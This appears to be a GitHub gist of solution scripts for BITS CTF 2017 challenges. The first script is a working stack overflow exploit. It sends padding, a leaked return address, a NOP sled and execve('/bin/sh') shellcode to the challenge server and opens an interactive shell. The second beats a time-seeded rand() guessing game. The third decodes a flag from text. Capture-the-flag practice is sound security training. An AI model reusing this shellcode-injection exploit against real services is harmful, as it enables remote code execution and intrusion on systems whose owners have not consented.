BITS CTF 2017
#! /usr/bin/env python3 | |
import sys | |
import struct | |
from telnetlib import Telnet | |
def p64(addr): | |
return struct.pack('<Q', addr) | |
def exploit(tn): | |
stack = int(tn.read_some()[0:14],16) | |
payload = b'AAAAAAAAAAAAAAAAAAAAAAAA' | |
sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' | |
payload += p64(stack+128) | |
payload += b'\x90'*256 | |
payload += sc | |
tn.write(payload) | |
tn.interact() | |
def main(argc, argv): | |
if argc != 2: | |
print('python {} l|r'.format(argv[0])) | |
sys.exit(1) | |
if argv[1] == 'r': | |
tn = Telnet('bitsctf.bits-quark.org', 1330) | |
exploit(tn) | |
else: | |
tn = Telnet('localhost', 1330) | |
exploit(tn) | |
if __name__ == '__main__': | |
main(len(sys.argv), sys.argv) |
from ctypes import * | |
from telnetlib import Telnet | |
def exploit(tn): | |
libc = CDLL("libc.so.6") | |
time = libc.time() | |
libc.srand(time) | |
for i in range(0, 30): | |
tn.read_until(b'round : ') | |
val = libc.rand() & 15 | |
tn.write(str(val).encode() + b'\n') | |
tn.interact() | |
def main(): | |
tn = Telnet('bitsctf.bits-quark.org', 1335) | |
exploit(tn) | |
if __name__ == '__main__': | |
main() |
#! /usr/bin/env python3 | |
import binascii | |
import sys | |
def main(): | |
with open('final.txt', 'r') as f: | |
data = f.read() | |
table = {} | |
string = '' | |
for i in range(0, len(data)): | |
if data[i].isupper(): | |
if data[i] in table.keys(): | |
table[data[i]] += 1 | |
else: | |
table[data[i]] = 1 | |
string += data[i] | |
string = string.replace('ZERO', '0') | |
string = string.replace('ONE', '1') | |
data = int(string, 2) | |
flag = binascii.unhexlify('%x' % data).decode() | |
print(flag) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment